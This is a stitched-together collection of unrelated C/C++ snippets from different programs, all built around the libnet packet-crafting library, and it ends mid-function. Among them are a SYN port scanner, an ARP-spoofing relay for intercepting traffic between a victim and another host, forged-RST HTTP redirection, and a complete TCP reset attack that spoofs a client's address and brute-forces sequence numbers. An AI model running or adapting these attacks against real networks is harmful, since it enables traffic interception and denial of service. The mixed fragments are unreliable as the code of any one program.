int update_SPORT(libnet_t *l, libnet_ptag_t t)
{
// u_int32_t SP;
int i=0;
// SP = (u_int32_t) tx.sp;
// SP++;
tx.sp++;
// Exceeded range => restart:
if ((tx.sp > tx.sp_stop) || // we exceeded the end of the range
(tx.sp == 65535) ) // or exceeded the 16-bit range
{
tx.sp = tx.sp_start;
i=1;
}
if (mode==UDP)
{
t = libnet_build_udp(tx.sp,
tx.dp,
tx.udp_len,
tx.udp_sum,
(tx.udp_payload_s) ? tx.udp_payload : NULL,
tx.udp_payload_s,
l,
t);
if (t == -1)
{
fprintf(stderr," mz/send_frame: UDP header manipulation failed!\n");
exit (1);
}
}
else // TCP
{
t = libnet_build_tcp (tx.sp,
tx.dp,
tx.tcp_seq,
tx.tcp_ack,
tx.tcp_control,
tx.tcp_win,
tx.tcp_sum,
tx.tcp_urg,
tx.tcp_len,
(tx.tcp_payload_s) ? tx.tcp_payload : NULL,
tx.tcp_payload_s,
l,
t);
if (t == -1)
{
fprintf(stderr, " mz/update_DPORT: Can't build TCP header: %s\n", libnet_geterror(l));
exit (0);
}
}
return i;
}
void sendsyns ()
{
libnet_t *l;
char errbuf[LIBNET_ERRBUF_SIZE];
u_long ip;
libnet_ptag_t tcp_pkt = LIBNET_PTAG_INITIALIZER;
libnet_ptag_t ip_pkt;
u_long dst_ip;
int count = 0;
char *payload = ""; // put your love note here.
u_short payload_s = strlen (payload);
int currentport = opts.low_port;
int build_header = 1;
/*
* pcap may be slow to initialize, so let's wait a second.
*/
sleep (1);
/*
* initialize libnet for raw IP packets. libnet will
* find an appropriate interface.
*/
l = libnet_init (LIBNET_RAW4, NULL, errbuf);
if (l == NULL) {
fprintf (stderr, "libnet_init failed: %s", errbuf);
exit (1);
}
/*
* get the IP address of the source interface
*/
ip = libnet_get_ipaddr4 (l);
if (-1 == ip) {
fprintf (stderr, "libnet_get_ipaddr4(l) failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
exit (1);
}
dst_ip = libnet_name2addr4 (l, (u_char *) opts.target, LIBNET_RESOLVE);
if (-1 == dst_ip) {
fprintf (stderr, "libnet_name2addr4() failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
exit (1);
}
/*
* Build and send a SYN packet, one for each port. The first time
* this loop is executed an IP packet will be constructed.
*/
printf ("scanning port %d through %d on %s\n",
opts.low_port,
opts.high_port, libnet_addr2name4 (dst_ip, LIBNET_DONT_RESOLVE));
while (currentport <= opts.high_port) {
/*
* Sleep a little... if we send packets too fast, some will get
* dropped.
*/
usleep (50);
/*
* Build the TCP packet with the SYN flag set. A payload is
* optional; for automated scans it is nice to include some text
* explaining why you are scanning (or ask first!). Fields with
* 0 will be calculated by libnet.
*/
tcp_pkt = libnet_build_tcp (opts.src_port, // source port
currentport++, // dest port
libnet_get_prand (LIBNET_PRu32), // seq
libnet_get_prand (LIBNET_PRu32), // ack
TH_SYN, // flags
libnet_get_prand (LIBNET_PRu16), // window size
0, // checksum
0, // urgent ptr
LIBNET_TCP_H + payload_s, // packet size
(u_char *) payload, // contents of packet
payload_s, // size of payload
l, // libnet handle
tcp_pkt); // libnet id
if (-1 == tcp_pkt) {
fprintf (stderr, "libnet_build_tcp() failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
exit (1);
}
if (build_header) {
build_header = 0;
ip_pkt = libnet_autobuild_ipv4 (LIBNET_IPV4_H + LIBNET_TCP_H,
IPPROTO_TCP, dst_ip, l);
if (-1 == ip_pkt) {
fprintf (stderr, "libnet_autobuild_ipv4() failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
}
}
/*
* Send it!
*/
count = libnet_write (l);
if (-1 == count) {
fprintf (stderr, "libnet_write() failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
}
}
printf ("\n");
}
/*-
-- ptag = n:tcp{
-- required arguments
src=port,
dst=port,
seq=int,
ack=int,
flags=int,
win=int,
urg=int,
-- optional arguments
ptag=int,
payload=str,
options=tcp_options,
}
ptag is optional, defaults to creating a new protocol block
options is optional
*/
static int lnet_tcp (lua_State *L)
{
libnet_t* ud = checkudata(L);
int src = v_arg_integer(L, 2, "src");
int dst = v_arg_integer(L, 2, "dst");
int seq = v_arg_integer(L, 2, "seq");
int ack = v_arg_integer(L, 2, "ack");
int flags = v_arg_integer(L, 2, "flags");
int win = v_arg_integer(L, 2, "win");
int urg = v_arg_integer(L, 2, "urg");
int ptag = lnet_arg_ptag(L, ud, 2, LIBNET_PBLOCK_TCP_H);
uint32_t payloadsz = 0;
const uint8_t* payload = checkpayload(L, 2, &payloadsz);
int options_ptag = 0;
uint32_t optionsz = 0;
const uint8_t* options = checklbuffer(L, 2, "options", &optionsz);
int cksum = 0; /* 0 is a flag requesting libnet to fill in correct cksum */
libnet_pblock_t* oblock = NULL;
int len = 0; /* libnet needs len for checksum calculation */
oblock = ptag ? libnet_pblock_find(ud, ptag)->prev : ud->pblock_end;
if(!oblock || oblock->type != LIBNET_PBLOCK_TCPO_H)
oblock = NULL;
else
options_ptag = oblock->ptag;
/* Two initial states possible:
* - has prev ip options block, or not
* Two final states desired:
* - has prev ip options block, or not
*/
if(!options) {
libnet_pblock_delete(ud, oblock);
} else {
options_ptag = libnet_build_tcp_options(options, optionsz, ud, options_ptag);
check_error(L, ud, options_ptag);
if(oblock) {
/* we replaced an existing block that was correctly placed */
} else if(ptag) {
libnet_pblock_insert_before(ud, ptag, options_ptag);
} else {
/* we just pushed a new options block, and are about to push a new ip block */
}
}
/* Rewrite len to be len of tcp pblock + previous blocks. */
{
libnet_pblock_t* p = ptag ? libnet_pblock_find(ud, ptag)->prev : ud->pblock_end;
len = LIBNET_TCP_H + payloadsz;
while(p) {
/* don't count tcpdata pblock... we will replace it payloadsz data below */
if(p->type != LIBNET_PBLOCK_TCPDATA)
len += p->b_len;
p = p->prev;
}
}
ptag = libnet_build_tcp(
src, dst, seq, ack, flags, win, cksum, urg,
len,
payload, payloadsz,
ud, ptag);
check_error(L, ud, ptag);
lua_pushinteger(L, ptag);
return 1;
}
/****************************
* CREATION OF PACKET STATE *
****************************/
void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
{
const struct sniff_ethernet *ethernet; /* The ethernet header */
const struct sniff_ip *ip; /* The IP header */
const struct sniff_tcp *tcp; /* The TCP header */
const struct sniff_udp *udp;
u_int8_t *payload; /* Packet payload */
u_int size_ip;
u_int size_protocol;
u_int16_t length_protocol;
/* Spoofed src and the real dst of the packets */
u_int32_t dip;
u_int32_t sip;
u_int8_t *daddr;
u_int8_t *saddr;
/* GET PACKET INFORMATION SUB-STATE */
if (packet == NULL)
{
printf(" * No packet received\n");
return;
}
if (DEBUG == 1)
{
printf(" DEBUG: Packet is not null\n Packet Type:\n");
}
ethernet = (struct sniff_ethernet*)(packet);
if (ethernet->ether_type == ETHER_IP)
{
ip = (struct sniff_ip*)(packet + SIZE_ETHERNET);
size_ip = IP_HL(ip)*4;
if (size_ip < 20) {
printf(" * Invalid IP header length: %i bytes\n", size_ip);
return;
}
if (DEBUG == 1)
{
printf(" * It's a valid IP packet\n");
}
/* Distinguish between TCP and UDP packets */
if (ip->ip_p == TCP_PROTOCOL)
{
tcp = (struct sniff_tcp*)(packet + SIZE_ETHERNET + size_ip);
size_protocol = TH_OFF(tcp)*4;
if (size_protocol < 20) {
printf(" * Invalid TCP header length: %u bytes\n", size_protocol);
return;
}
}
else if (ip->ip_p == UDP_PROTOCOL)
{
udp = (struct sniff_udp*)(packet + SIZE_ETHERNET + size_ip);
size_protocol = SIZE_UDP;
}
}
else if (ethernet->ether_type == ETHER_ARP)
{
struct sniff_arp * arp;
arp = (struct sniff_arp*)(packet + SIZE_ETHERNET);
if (DEBUG)
{
printf(" * It's a ARP Packet\n");
}
int length;
spoof_arp(inet_addr(victim_ip), /* target (me) protocol address */
inet_addr((char*)arp->arp_spa), /* destination (hacker) protocol address */
(u_int8_t*) libnet_hex_aton(victim_ethernet, &length), /* target (me) hw address */
(u_int8_t*) &arp->arp_sha); /* destination protocol address */
spoof_arp(inet_addr(relayer_ip),
inet_addr((char*)arp->arp_spa),
(u_int8_t*) libnet_hex_aton(relayer_ethernet, &length),
(u_int8_t*) &arp->arp_sha);
return;
}
else
{
fprintf(stderr, "Don't know this protocol. Shutting down\n");
exit(1);
}
/* FIGURE OUT WHOM TO SEND THE PACKET AND SPOOF WHOM
ITS FROM SUB-STATE (puh! long name) */
/* Ignoring the PORT because they doesn't matter in
deciding where to send the packet. The ports will
be the same if it's the relayere, victim or the hacker
which receives the packet */
if (DEBUG == 1)
{
printf(" DEBUG: Deciding source and destionation addresses:\n");
}
int length; /* don't know why I need this ... But just to be safe.. */
if(ip->ip_dst.s_addr == inet_addr(victim_ip)) /* Not sure if this comparison works... */
{
sip = inet_addr(relayer_ip);
saddr = (u_int8_t*)libnet_hex_aton(relayer_ethernet, &length);
if (saddr == NULL)
{
fprintf(stderr, "Couldn't Convert MAC address: %s\n", relayer_ethernet);
exit(1);
}
if (DEBUG == 1)
{
printf(" * Src IP: %s\n", relayer_ip);
printf(" * Dst Ether: %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
saddr[0],saddr[1],saddr[2],saddr[3],saddr[4],saddr[5]);
}
}
else if (ip->ip_dst.s_addr == inet_addr(relayer_ip))
{
sip = inet_addr(victim_ip);
saddr = (u_int8_t*)libnet_hex_aton(victim_ethernet, &length);
if (saddr == NULL)
{
fprintf(stderr, "Couldn't Convert MAC address: %s\n", victim_ethernet);
exit(1);
}
if (DEBUG == 1)
{
printf(" * Src IP: %s\n", victim_ip);
printf(" * Dst Ether: %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
saddr[0],saddr[1],saddr[2],saddr[3],saddr[4],saddr[5]);
}
}
/* destination is always the same */
dip = ip->ip_src.s_addr;
daddr = (u_int8_t*)ethernet->ether_shost;
if (daddr == NULL)
{
fprintf(stderr, "Couldn't fetch the dst MAC addr from ethernet header\n");
exit(1);
}
if (DEBUG == 1)
{
printf(" * Dst IP: %s\n", inet_ntoa(ip->ip_src));
printf(" * Dst Ether: %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
daddr[0],daddr[1],daddr[2],daddr[3],daddr[4],daddr[5]);
}
/* GENERATE PACKET SUB-STATE */
if (DEBUG == 1)
{
printf(" DEBUG: Trying to generate packet\n");
}
/* Initialize libnet */
libnet_t *l;
char errbuf_net[LIBNET_ERRBUF_SIZE];
l = libnet_init(LIBNET_LINK, dev, errbuf_net);
if(l == NULL)
{
fprintf(stderr, "Error Opening Context: %s\n", errbuf_net);
return;
}
if(ethernet->ether_type == ETHER_IP)
{
if (ip->ip_p == TCP_PROTOCOL)
{
/* Create TCP packet with switched src and dst ports */
libnet_ptag_t libnet_tcp = 0;
int size_payload;
size_payload = ntohs(ip->ip_len) - (size_ip + size_protocol);
u_int8_t *tcp_options = (u_int8_t* )(packet + SIZE_ETHERNET + size_ip + 20);
u_int32_t size_tcp_options = (u_int32_t)(size_protocol - 20);
libnet_build_tcp_options(tcp_options, size_tcp_options, l, 0);
if (size_payload == 0)
{
payload = NULL;
}
else
{
payload = (u_int8_t *)(packet + SIZE_ETHERNET + size_ip + size_protocol);
}
if (DEBUG == 1)
{
printf(" * Size of payload %i\n", size_payload);
printf(" * Size of IP header %i\n", size_ip);
printf(" * Size of IP length %i\n", ip->ip_len);
}
length_protocol = size_protocol + size_payload;
libnet_tcp = libnet_build_tcp(htons(tcp->th_sport),
htons(tcp->th_dport),
ntohl(tcp->th_seq),
ntohl(tcp->th_ack),
tcp->th_flags,
ntohs(tcp->th_win),
0,
ntohs(tcp->th_urp),
length_protocol,
payload,
size_payload,
l,
libnet_tcp);
if (libnet_tcp == -1)
{
fprintf(stderr, "Unable to build TCP header: %s\n", libnet_geterror(l));
exit(1);
}
if (DEBUG == 1)
{
printf(" * IP packet successfully generated\n");
}
}
else if (ip->ip_p == UDP_PROTOCOL)
{
/* Create a new UDP packet but with switched ports */
libnet_ptag_t libnet_udp = 0;
int size_payload;
size_payload = ntohs(ip->ip_len) - size_ip;
payload = (u_int8_t *)(packet + SIZE_ETHERNET + size_ip + size_protocol);
length_protocol = (udp->uh_length) + size_payload;
libnet_udp = libnet_build_udp(htons(udp->uh_dport),
htons(udp->uh_sport),
length_protocol,
0,
payload,
size_payload,
l,
libnet_udp);
if (libnet_udp == -1)
{
fprintf(stderr, "Unable to build UDP header: %s\n", libnet_geterror(l));
exit(1);
}
}
/* Create a new IP packet with the IP for src and dst switched */
u_int8_t* ip_options = (u_int8_t*)(packet + SIZE_ETHERNET + 20);
u_int32_t size_ip_options = (u_int32_t)(size_ip - 20);
libnet_build_ipv4_options(ip_options, size_ip_options, l, 0);
int size_ip_payload;
u_int8_t* ip_payload;
if (ip->ip_p == TCP_PROTOCOL || ip->ip_p == UDP_PROTOCOL)
{
ip_payload = NULL;
size_ip_payload = 0;
}
else
{
ip_payload = (u_int8_t*)(packet + SIZE_ETHERNET + size_ip);
size_ip_payload = ntohs(ip->ip_len) - size_ip;
}
libnet_ptag_t libnet_ipv4 = 0;
libnet_ipv4 = libnet_build_ipv4(ntohs(ip->ip_len),
ip->ip_tos,
ntohs(ip->ip_id),
ntohs(ip->ip_off),
ip->ip_ttl,
ip->ip_p,
0,
sip,
dip,
ip_payload,
size_ip_payload,
l,
libnet_ipv4);
if (libnet_ipv4 == -1)
{
fprintf(stderr, "Unable to build IPv4 header: %s\n", libnet_geterror(l));
exit(1);
}
}
/* Last but not least the Ethernet packet (Not sure if we're gonna need it) */
libnet_ptag_t libnet_eth = 0;
libnet_eth = libnet_build_ethernet(daddr,
saddr,
ETHERTYPE_IP,
NULL,
0,
l,
libnet_eth);
if (libnet_eth == -1)
{
fprintf (stderr, "Unable to build Ethernet header: %s\n", libnet_geterror(l));
exit(1);
}
if (DEBUG == 1)
{
printf(" * Ethernet packet successfully generated\n");
}
/* This probably not a good idea to run for a long time
on my own network */
if ((libnet_write(l)) == -1)
{
fprintf(stderr, "Unable to send packet: %s\\n", libnet_geterror(l));
exit(1);
}
else
{
if (DEBUG == 1)
{
printf(" DEBUG: Packet replicated and sent\n");
}
}
libnet_destroy(l); /* Always need to call this before returning
* It should have been a mechanism that you could
* use for "after return do this"
*/
}
int
main(int argc, char *argv[])
{
int c;
libnet_t *l;
u_long src_ip, dst_ip, length;
libnet_ptag_t t = 0;
char errbuf[LIBNET_ERRBUF_SIZE];
u_char *payload = NULL;
u_long payload_s = 0;
u_char marker[LIBNET_BGP4_MARKER_SIZE];
u_char type;
printf("libnet 1.1 packet shaping: BGP4 hdr + payload[raw]\n");
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
memset(marker, 0x1, LIBNET_BGP4_MARKER_SIZE);
type = 0;
while ((c = getopt(argc, argv, "d:s:t:m:p:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'm':
memcpy(marker, optarg, LIBNET_BGP4_MARKER_SIZE);
break;
case 't':
type = atoi(optarg);
break;
case 'p':
payload = (u_char *)optarg;
payload_s = strlen((char *)optarg);
break;
default:
exit(EXIT_FAILURE);
}
}
if (!src_ip || !dst_ip)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
length = LIBNET_BGP4_HEADER_H + payload_s;
t = libnet_build_bgp4_header(
marker, /* marker */
length, /* length */
type, /* message type */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build BGP4 header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_TCP_H;
t = libnet_build_tcp(
0x6666, /* source port */
179, /* destination port */
0x01010101, /* sequence number */
0x02020202, /* acknowledgement num */
TH_SYN, /* control flags */
32767, /* window size */
0, /* checksum */
0, /* urgent pointer */
length, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_IPV4_H;
t = libnet_build_ipv4(
length, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
static gboolean http_redirector( pcap_process_thread_param * param, gpointer user_data)
{
/*******************************************************************
* here we use TCP
* when we recv a SYN=1,ACK=0 packet, we just send a syn=1,ack=1 packet
* that contains nothing
* then we push a packet taht contains
* HTTP/1.0 302 Found
* Location: http://192.168.0.1/
* connection:close
*
* please visit http://192.168.0.1
* and then we reset the connection
* ****************************************************************/
struct tcphdr * tcp_head;
struct udphdr * udp_head;
if(clientmgr_get_client_is_enable_by_mac(param->packet_linklayer_hdr+6))
{
//继续交给后续代码处理
return FALSE ;
}
//非 enable 的客户端,现在要开始这般处理了,重定向到 ... 嘿嘿
struct iphdr * ip_head = (typeof(ip_head))(param->packet_ip_contents);
if (ip_head->daddr == redirector_ip)
{
return TRUE;
}
if (ip_head->saddr == redirector_ip)
{
return TRUE;
}
//如果是在 white list ....
if (whiteip && g_list_find(whiteip, GINT_TO_POINTER(ip_head->daddr)))
return FALSE;
if (whiteip && g_list_find(whiteip, GINT_TO_POINTER(ip_head->saddr)))
return FALSE;
// g_debug(_("thread %p is doing the redirect stuff"),g_thread_self());
//Retrive the tcp header and udp header
tcp_head = (struct tcphdr*) ((char*) ip_head + ip_head->ihl * 4);
udp_head = (struct udphdr*) ((char*) ip_head + ip_head->ihl * 4);
#ifdef DEBUG_ONLY_HTTP_PORT
if (tcp_head->dest != HTTP_PORT)
return TRUE;
#endif
//初始化libnet,每个线程一个 libnet ;)
init_thread_libnet();
// http 重定向
if(ip_head->protocol == IPPROTO_TCP && tcp_head->dest == HTTP_PORT)
{
u_int8_t tcp_flags = ((struct libnet_tcp_hdr *) tcp_head)->th_flags;
if(tcp_flags == TH_SYN)
{
/********************************
* 对于这样的一个握手数据包
* 我们应该要建立连接了
* 回复一个syn ack 就是了
*********************************/
// here we just echo ack and syn.
libnet_build_tcp(ntohs(tcp_head->dest), ntohs(tcp_head->source), tcp_head->seq, ntohl(
tcp_head->seq) + 1, TH_ACK | TH_SYN, 4096, 0, 0, 20, 0, 0,
libnet, 0);
libnet_build_ipv4(40, 0, 0, 0x4000, 63/*ttl*/, IPPROTO_TCP, 0,
ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0);
libnet_write(libnet);
libnet_clear_packet(libnet);
libnet_build_tcp(ntohs(tcp_head->dest), ntohs(tcp_head->source), tcp_head->seq, ntohl(
tcp_head->seq) + 1, TH_ACK | TH_SYN, 4096, 0, 0, 20, 0, 0,
libnet, 0);
libnet_build_ipv4(40, 0, 0, 0x4000, 63/*ttl*/, IPPROTO_TCP, 0,
ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0);
}else if (tcp_flags & (TH_ACK|TH_SYN) )
{
/*********************************************
*现在是发送页面的时候啦!
*********************************************/
int SIZEHTTPHEAD = strlen((const char*) httphead);
libnet_build_tcp(ntohs(tcp_head->dest), ntohs(tcp_head->source), ntohl(tcp_head->ack_seq),
ntohl(tcp_head->seq) + ntohs(ip_head->tot_len) - 40, TH_ACK
| TH_PUSH | TH_FIN, 4096, 0, 0, 20 + SIZEHTTPHEAD,
httphead, SIZEHTTPHEAD, libnet, 0);
libnet_build_ipv4(40 + SIZEHTTPHEAD, 0, 0, 0x4000, 63/*ttl*/,
IPPROTO_TCP, 0, ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0);
}
else if (tcp_flags & (TH_FIN|TH_RST))
{
/*********************************************************
*好,现在结束连接!
********************************************************/
libnet_build_tcp(ntohs(tcp_head->dest), ntohs(tcp_head->source), ntohl(tcp_head->ack_seq),
ntohl(tcp_head->seq) + 1, TH_ACK|TH_RST, 4096, 0, 0, 20, 0, 0, libnet,
0);
libnet_build_ipv4(40, 0, 0, 0x4000, 63/*ttl*/, IPPROTO_TCP, 0,
ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0);
printf("------------------------------------------------------------------------link disconnect\n");
}else{
return FALSE;
}
}//其他 TCP 直接 RST
else if( ip_head->protocol == IPPROTO_TCP)
{
libnet_build_tcp(ntohs(tcp_head->dest), ntohs(tcp_head->source), ntohl(tcp_head->ack_seq),
ntohl(tcp_head->seq) + 1, TH_ACK|TH_RST, 4096, 0, 0, 20, 0, 0, libnet,
0);
libnet_build_ipv4(40, 0, 0, 0x4000, 63/*ttl*/, IPPROTO_TCP, 0,
ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0);
}else if(ip_head->protocol == IPPROTO_UDP && udp_head->dest != DNS_PORT)
{
//现在是 UDP 的时代了
libnet_build_udp(ntohs(udp_head->dest),ntohs(udp_head->source),
sizeof(blank)+sizeof(struct udphdr),0,blank,sizeof(blank),libnet,0);
libnet_build_ipv4(40, 0, 0, 0x4000, 63/*ttl*/, IPPROTO_UDP, 0,
ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0);
}else
return FALSE;
// if(param->linklayer_len == 14)
// libnet_build_ethernet(
// ((struct libnet_ethernet_hdr *) param->packet_linklayer_hdr)->ether_shost,
// /((struct libnet_ethernet_hdr *) param->packet_linklayer_hdr)->ether_dhost,
// ETHERTYPE_IP, 0, 0, libnet, 0);
libnet_autobuild_ethernet(
((struct libnet_ethernet_hdr *) param->packet_linklayer_hdr)->ether_shost,
ETHERTYPE_IP,libnet
);
libnet_write(libnet);
libnet_clear_packet(libnet);
return TRUE;
}
int main(int argc, char **argv)
{
char *srv_addr;
char *srv_port;
char *cli_addr;
char *cli_port;
libnet_t *attack;
u_int32_t srv_ip_addr, cli_ip_addr, seq_num;
libnet_ptag_t ip_tag, tcp_tag;
char *error_msg = "Error";
if(argc >= 2) {
cli_addr = argv[1];
} else {
cli_addr = "127.0.0.1";
}
if(argc >= 3) {
cli_port = argv[2];
} else {
cli_port = "10001";
}
if (argc >= 4) {
srv_addr = argv[3];
} else {
srv_addr = "127.0.0.1";
}
if (argc >= 5) {
srv_port = argv[4];
}
else {
srv_port = "9999";
}
seq_num = 1200000000;
ip_tag=0;
tcp_tag=0;
attack = libnet_init(LIBNET_RAW4, srv_addr, error_msg); // 2nd parameter device may have to be changed
srv_ip_addr = libnet_name2addr4(attack, srv_addr, LIBNET_DONT_RESOLVE);
cli_ip_addr = libnet_name2addr4(attack, cli_addr, LIBNET_DONT_RESOLVE);
//atoi(cli_port);
//atoi(srv_port);
libnet_build_tcp( atoi(cli_port), /* src port */ //problem
atoi(srv_port), /* destination port */ //problem
seq_num, /* sequence number */
0, /* acknowledgement */
TH_RST, /* control flags */
7, /* window */
0, /* checksum - 0 = autofill */
0, /* urgent */
LIBNET_TCP_H, /* header length */
NULL, /* payload */
0, /* payload length */
attack, /* libnet context */
tcp_tag); /* protocol tag */
libnet_build_ipv4(LIBNET_TCP_H + LIBNET_IPV4_H, /* length */
0, /* TOS */
libnet_get_prand (LIBNET_PRu16), /* IP ID */
0, /* frag offset */
127, /* TTL */
IPPROTO_TCP, /* upper layer protocol */
0, /* checksum, 0=autofill */
cli_ip_addr, /* src IP */
srv_ip_addr, /* dest IP */
NULL, /* payload */
0, /* payload len */
attack, /* libnet context */
ip_tag); /* protocol tag */
printf("starting reset attack on TCP connection: client %s:%s, server %s:%s\n",
cli_addr, cli_port, srv_addr, srv_port);
printf("Libnet value: %d: %u\nServer Port: %s\nClient Port: %s", libnet_write(attack), seq_num, srv_port, cli_port);
//libnet_write(attack)
libnet_destroy(attack);
for(seq_num = (1200000000-16384); seq_num>0; seq_num=(seq_num-16384))
{
attack = libnet_init(LIBNET_RAW4, srv_addr, error_msg); // 2nd parameter device may have to be changed
libnet_build_tcp(atoi(cli_port), atoi(srv_port), seq_num,
0, TH_RST, 7,0, 0, LIBNET_TCP_H, NULL, 0, attack, tcp_tag);
libnet_build_ipv4(LIBNET_TCP_H + LIBNET_IPV4_H, 0, libnet_get_prand (LIBNET_PRu16), 0, 127, IPPROTO_TCP,
0, cli_ip_addr, srv_ip_addr, NULL, 0, attack, ip_tag);
//libnet_write(attack);
//printf("Libnet value: %d: %d\n", libnet_write(attack), seq_num);
libnet_write(attack);
libnet_destroy(attack);
}
printf("Test3"); //attack successful
//libnet_destroy(attack);
return 0;
}
void PcapGen::send_tcp_packet(
const TcpState& from, const TcpState& to,
uint8_t control,
const uint8_t* data, size_t size)
{
if (!lnet_)
return;
libnet_build_tcp(from.port(), // sp
to.port(), // dp
from.seq(), // seq
control & TH_ACK ? from.ack() : 0, // ack
control, // control
from.win(), // win
0, // sum
0, // urg
LIBNET_TCP_H + size, // len
data,
(uint32_t)size,
lnet_.get(),
0);
libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H + size, // ip_len
0, // tos
libnet_get_prand(LIBNET_PRu32), // id
0, // frag
64, // ttl
IPPROTO_TCP,
0, // sum
from.ip_addr(), // src
to.ip_addr(), // dst
0,
0,
lnet_.get(),
0);
libnet_build_ethernet(from.mac_addr(),
to.mac_addr(),
ETHERTYPE_IP,
0,
0,
lnet_.get(),
0);
// see libnet_write() source code; calling internal function here
uint32_t packet_size;
uint8_t *packet_data;
auto c = libnet_pblock_coalesce(lnet_.get(), &packet_data, &packet_size);
if (c == -1) {
libnet_clear_packet(lnet_.get());
return;
}
pcap_pkthdr packet_hdr;
packet_hdr.ts.tv_sec = 0;
packet_hdr.ts.tv_usec = 0;
packet_hdr.len = packet_size;
packet_hdr.caplen = packet_size;
pcap_dump(reinterpret_cast<u_char *>(pcap_dump_.get()),
&packet_hdr, packet_data);
// see libnet_write() source code
if (lnet_->aligner > 0) {
packet_data -= lnet_->aligner;
}
free(packet_data);
libnet_clear_packet(lnet_.get());
}
int
main(int argc, char **argv)
{
int sock, c;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
u_char *cp, *buf;
u_char *payload = "hello world";
u_char *options = " This here is a 40-byte IP option list.";
int payload_s = strlen(payload);
int option_s = strlen(options);
struct ipoption ipopt;
src_ip = 0;
dst_ip = 0;
src_prt = 0;
dst_prt = 0;
printf("IP + options and TCP + payload packet building/writing test\n");
while((c = getopt(argc, argv, "d:s:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
if (!(dst_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
src_prt = (u_short)atoi(cp);
if (!(src_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
}
}
if (!src_ip || !src_prt || !dst_ip || !dst_prt)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
/*
* Get packet memory. Let's get plenty.
*/
buf = malloc(IP_MAXPACKET);
if (!buf)
{
perror("No memory for packet");
exit(EXIT_FAILURE);
}
/*
* Open our raw IP socket and set IP_HDRINCL.
*/
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1)
{
perror("No socket");
exit(EXIT_FAILURE);
}
/*
* Build the IP header (shown exploded for commenting).
*/
libnet_build_ip(LIBNET_TCP_H + payload_s,/* Size of the payload */
0, /* IP tos */
242, /* IP ID */
0, /* Frag stuff */
48, /* TTL */
IPPROTO_TCP, /* Transport protocol */
src_ip, /* Source IP */
dst_ip, /* Destination IP */
NULL, /* Pointer to payload (none) */
0,
buf); /* Packet header memory */
/*
* Build the TCP header.
*/
libnet_build_tcp(src_prt, /* Source TCP port */
dst_prt, /* Destination TCP port */
11111, /* Sequence number */
99999, /* Acknowledgement number */
TH_SYN|TH_ACK, /* Control flags */
1024, /* Window size */
0, /* Urgent pointer */
payload, /* Pointer to payload */
payload_s,
buf + LIBNET_IP_H); /* Packet header memory */
/*
* Calculate the TCP header checksum (IP header checksum is *always* done
* by the kernel.
*/
libnet_do_checksum(buf, IPPROTO_TCP, LIBNET_TCP_H + payload_s);
memcpy(ipopt.ipopt_list, options, option_s);
*(ipopt.ipopt_list) = IPOPT_SECURITY;
*(ipopt.ipopt_list + 1) = 1;
/*
* Insert the IP options.
*/
